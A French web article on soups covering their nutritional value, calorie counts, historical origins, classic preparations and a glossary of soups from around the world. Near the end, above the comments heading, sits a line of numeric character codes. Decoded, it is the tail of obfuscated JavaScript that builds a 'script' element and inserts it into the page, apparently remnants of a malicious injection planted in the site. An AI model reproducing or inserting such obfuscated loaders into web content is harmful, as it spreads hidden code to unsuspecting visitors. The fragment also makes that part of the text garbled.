Soupes : allier santé et gastronomie


1

En sus de réchauffer en hiver, la soupe est un bon moyen de consommer des légumes… Et pour la rendre originale, il suffit de mélanger les goûts, les textures ainsi que les couleurs…

La base d’une soupe réussie tient essentiellement au bouillon. Et cela peut être un bouillon de légumes, de poulet, de viande ou de poisson. Les bouillons cubes qui se vendent dans le commerce permettent un gain de temps appréciable mais rien ne vaut le bouillon fait maison.

Cependant, il faut savoir qu’un bon bouillon dépend des ingrédients qui sont utilisés pour le concevoir. Le bouillon maison se prépare avec des carottes, des poireaux et une branche de céleri, éventuellement de petits navets, voire quelques feuilles de chou préalablement blanchies.

Polyvalente, la soupe peut être réalisée en utilisant différents ingrédients, et elle se prépare assez rapidement. Il est préférable de cuire sa soupe à la pression dans une cocotte-minute, car la cuisson rapide limite la perte de vitamines. L’association de plusieurs légumes donne également à la soupe une grande valeur nutritionnelle : les nutriments ainsi associés sont encore plus efficaces.

Riche en minéraux également, elle garantit une bonne hydratation. Servie chaude, elle se consomme lentement et rassasie rapidement, ce qui favorise un bon contrôle de la prise énergétique au cours du repas.


La soupe, un plat peu calorique

soupes-allier-sante-et-gastronomie (1)

La soupe est un plat particulièrement peu calorique. Ainsi, 250 ml de soupe apportent environ selon les recettes : 52 kcal pour la soupe chinoise, 70 kcal pour la soupe poireaux / pommes de terre, 72 kcal pour la soupe à l’oignon, 72 kcal pour la soupe de poisson, 75 kcal pour la soupe aux légumes, 80 kcal pour le minestrone et 102 kcal pour la soupe d’asperges.

Ce qui est intéressant, c’est que vous pouvez mettre une sélection d’ingrédients frais, cuits ou encore crus dans une poêle avec un bouillon et en un tour de main, vous avez une bonne soupe maison. Certaines soupes sont idéales en entrée tandis que d’autres sont assez consistantes pour être servies comme plat principal.

Les soupes servies en tant que plat principal sont alors accompagnées de croûtons. À savoir que la préparation des soupes, elle-même, nécessite peu de matériel mais l’utilisation d’un bon mixer est indispensable.

Pour transformer une soupe en un repas complet, il suffit d’y inclure une source de protéines pour vous soutenir jusqu’au prochain repas. À une soupe aux légumes ou aux pâtes, on ajoute l’équivalent d’une portion de viande ; par exemple, 75g de poulet ou 3/4 tasse (175ml) de légumineuses (lentilles, haricots rouges, pois chiches).

Également, on peut accompagner sa soupe d’une source de protéines comme du fromage, du yaourt ou un oeuf à la coque.

soupes-allier-sante-et-gastronomie (4)

À l’origine…

Au XIIème siècle, la soupe était une tranche de gros pain sur laquelle on versait un bouillon. L’origine du potage, «aliments cuits au pot», remonte au XVIIIème siècle ; il est préféré à «soupe», jugé trop rustique. Servi chaud ou glacé en été, il a encore aujourd’hui une connotation sophistiquée.

Bouillon: le plus connu est celui du pot-au-feu. Liquide de cuisson de viande ou de légumes, d’une grande valeur nutritive et véritable concentré de saveurs et de parfums, il est une base de la cuisine, notamment de nombreuses formes de potages et de consommés.

soupes-allier-sante-et-gastronomie (2)

Consommé: à base de bouillon (boeuf, volaille, gibier, poisson), il se déguste chaud ou glacé. Préparé dans les règles de l’art, il doit être parfaitement limpide (dégraissé ou clarifié au blanc d’oeuf) et bien parfumé.

Velouté: lisse, onctueux, exécuté à partir d’un consommé monté au beurre, lié au jaune d’oeuf et à la crème fraîche, il est parfois enrichi de viandes, de poisson, de légumes ou de crustacés et servi avec des croûtons.

Crème: élaborée, raffinée, elle est faite de légumes mis en purée au moulin ou au mixer, et liés à la crème fraîche. La plus célèbre étant la vichyssoise.

Bisque: velouté dont l’ingrédient majeur est un crustacé, lié au jaune d’oeuf et à la crème. Une entrée élégante.


Les soupes du monde

Borchtch: Venu de Russie avec les émigrés en 1920, c’est un bouillon de pot-au-feu, légumes et betteraves (d’où sa couleur rouge). Il est servi avec de la crème aigre-douce et de petits pâtés à la viande.

Bouillabaisse: Préparée par les Méditerranéens au retour de la pêche avec du poisson de roche bouilli, elle est relevée de croûtons aillés et de rouille.

soupes-allier-sante-et-gastronomie (3)

Bourride: Soupe de poisson enrichie d’aïoli préparée à Marseille depuis la plus haute antiquité.

Crécy: Fameuse crème aux carottes.

Gaspacho: La soupe andalouse, celle des soirs d’été par excellence. Servie glacée, elle est à base de mie de pain et de jus de légumes (concombre, tomate, oignon, ail, poivron) et d’huile d’olive.

Gratinée à l’oignon: La soupe des Parisiens, celle des noctambules et des débardeurs des Halles qui se rejoignaient au petit matin.

Hochepot: Solide soupe flamande avec de la viande, du lard, de la chipolata et du chou.

Harira: Soupe marocaine traditionnellement servie pendant la période du Ramadan. Elle est à base de lentilles et de pois chiches.

Madrilène: Ce consommé de volaille et tomate est servi le plus souvent froid, dans le monde entier et, bien sûr, à Madrid.

Minestrone: La grande soupe italienne de légumes, enrichie de pâte au Sud, de riz au Nord et parfois de parmesan.

Oxtail: Le plus anglais des potages, lancé à Londres par les Français émigrés de la Révolution : un consommé de queue de boeuf.

À la parisienne: Le grand classique des potages : poireaux / pommes de terre et lait, décoré de pluches de cerfeuil.

Pistou: Soupe de l’été en Provence avec des légumes du jardin, haricots blancs, pâtes, liés au pistou (basilic pilé avec de l’ail nouveau) et fromage râpé.

soupes-allier-sante-et-gastronomie (5)

Vichyssoise: Crème née aux Etats-Unis d’une recette française, le fameux « poireaux/pommes de terre » lié à la crème fraîche, parfumé à la ciboulette et servi glacé.

Waterzoï: Typiquement belge, ce potage de poulet et légumes est un véritable plat complet.

Source : lexpress.mu/

,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));

Commentaires